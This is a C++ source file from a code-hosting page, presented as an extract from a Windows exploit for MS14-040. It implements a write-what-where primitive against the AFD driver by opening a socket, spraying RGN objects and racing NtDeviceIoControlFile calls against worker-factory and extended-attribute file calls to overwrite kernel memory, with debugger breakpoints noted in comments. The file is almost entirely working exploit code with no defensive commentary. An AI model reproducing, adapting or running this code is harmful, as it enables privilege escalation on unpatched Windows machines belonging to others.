-
Notifications
You must be signed in to change notification settings - Fork 26
/
Copy pathMS14-040.cpp
173 lines (152 loc) · 4.39 KB
/
MS14-040.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
/*
This is an extract from an exploit for MS14-040
*/
void write_what_where(UINT64 what, UINT64 where)
{
write_what_where_afd(what & 0xffffffff, where, what >> 32 & 0xffffffff, where + 4);
}
/*
To debug what's going on, break on :
Afd!AfdReturnTpInfo+8f
nt!NtQueryEaFile+10d
nt!NtSetInformationWorkerFactory+1a8
*/
int write_what_where_afd(UINT32 what32, UINT64 where, UINT32 what32_2, UINT64 where_2)
{
WSADATA wd = { 0 };
SOCKET sock;
sockaddr_in clientService;
DWORD i = 0, r = 0;
NTSTATUS st = 0;
load();
if (WSAStartup(MAKEWORD(2, 0), &wd))
{
printf("[-]Failed to initialize winsock (%08x)\n", WSAGetLastError());
getchar();
exit(1);
}
sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if (sock == INVALID_SOCKET)
{
printf("[-]Failed to create socket (%08x)\n", WSAGetLastError());
getchar();
exit(1);
}
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr("173.194.66.99");
clientService.sin_port = htons(80);
r = connect(sock, (SOCKADDR *)& clientService, sizeof (clientService));
if (r == SOCKET_ERROR)
{
printf("[-]Failed to connect %d\n", WSAGetLastError());
getchar();
exit(1);
}
PUINT64 chunk = (PUINT64)malloc(0x10000);
PUINT64 input1 = (PUINT64)malloc(0x10000);
PUINT64 input2 = (PUINT64)malloc(0x10000);
PUINT64 output = (PUINT64)malloc(0x10000);
UINT32 vaddr = 0x13371337;
UINT32 targetSize = 0x100; // >= 0x100
UINT32 mdlsize = (pow(2.0, 0x0c) * (targetSize - 0x30) / 8) - 0xfff - (vaddr & 0xfff);
input1[0] = 0;
input1[1] = 0;
input1[2] = 0;
input1[3] = 0;
input1[4] = 0;
input1[5] = 0;
input1[6] = (UINT64)vaddr;
input1[7] = (UINT64)mdlsize;
input1[8] = 0;
input1[9] = 0;
input1[10] = 1;
input1[11] = 0;
input2[0] = 1;
input2[1] = 0xaaaaaaa;
input2[2] = 0;
input2[3] = 0;
input2[4] = 0;
input2[5] = 0;
DWORD nBottomRect = 0x2aaaaaa;
HRGN* prgn = (HRGN*)malloc(0x10000);
if (!prgn)
{
puts("[-]Failed to allocate array of RGN");
getchar();
exit(1);
}
while (1)
{
prgn[i++] = CreateRoundRectRgn(0, 0, 1, nBottomRect, 1, 1);
if (!prgn[i - 1])
break;
}
printf("[+]%d RGN allocated\n", i);
IO_STATUS_BLOCK b;
HANDLE h;
HANDLE hproc;
HFILE hfile;
OFSTRUCT of;
hproc = GetCurrentProcess();
hfile = OpenFile("test.txt", &of, OF_CREATE);
h = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
if (!h)
{
printf("Failed to CreateIoCompletionPort %x\n", GetLastError());
getchar();
return 0;
}
PUINT32 ptr = (PUINT32)malloc(0x1000);
PUINT32 pWorkerFactoryHandle = (PUINT32)malloc(0x1000);
PUINT32 buffer = (PUINT32)malloc(0x1000);
PUINT64 ealist = (PUINT64)malloc(0x1000);
PUINT32 yaop = (PUINT32)malloc(0x1000);
PUINT64 superevil = (PUINT64)malloc(0x1000);
PUINT32 wfinfo = (PUINT32)malloc(0x1000);
memset(wfinfo, '1', 0x100);
ULONG ealistlength = 0x100;
memset(ptr, 0x18, 0x100);
memset(pWorkerFactoryHandle, 1, 0x100);
memset(buffer, 'Z', 0x1000);
memset(ealist, 'T', 0x1000);
memset(yaop, 'A', 0x1000);
memset(superevil, 'B', 0x1000);
if (!SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS))
{
printf("[-]Failed to set high priority to the process\n");
getchar();
exit(1);
}
if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST))
{
printf("[-]Failed to set high priority to attacker thread (%08x)\n", WSAGetLastError());
getchar();
exit(1);
}
HANDLE factoryArray[0x10000];
HANDLE dummy[1000];
int j = 0;
int bad = 1;
int timeout = 1;
ealist[12] = (UINT64)superevil;
yaop[0] = what32;
superevil[8] = where - 0x2c;
while (bad)
{
Sleep(11);
NtDeviceIoControlFile((HANDLE)sock, NULL, NULL, NULL, &b, 0x1207f, input1, 0x40, output, 0);
NtCreateWorkerFactory((PVOID)pWorkerFactoryHandle, (PVOID)0xf00ff, (PVOID)NULL, (PVOID)h, (PVOID)hproc, (PVOID)0x45, (PVOID)0x46, (PVOID)0x47, (PVOID)0x48, (PVOID)0x49);
NtDeviceIoControlFile((HANDLE)sock, NULL, NULL, NULL, &b, 0x120c3, input2, 0x18, output, 0);
ZwQueryEaFile((HANDLE)hfile, &b, buffer, 10, FALSE, ealist, ealistlength, NULL, FALSE);
//NtQueryInformationWorkerFactory((HANDLE)*pWorkerFactoryHandle, (PVOID)7, wfinfo, (PVOID)0x78, (PVOID)NULL);
NtSetInformationWorkerFactory((HANDLE)*pWorkerFactoryHandle, (PVOID)0x8, (PVOID)yaop, (PVOID)0x4, (PVOID)0x44);
yaop[0] = what32_2;
superevil[8] = where_2 - 0x2c;
NtSetInformationWorkerFactory((HANDLE)*pWorkerFactoryHandle, (PVOID)0x8, (PVOID)yaop, (PVOID)0x4, (PVOID)0x44);
if (!--timeout)
{
bad = 0;
}
}
return 1;
}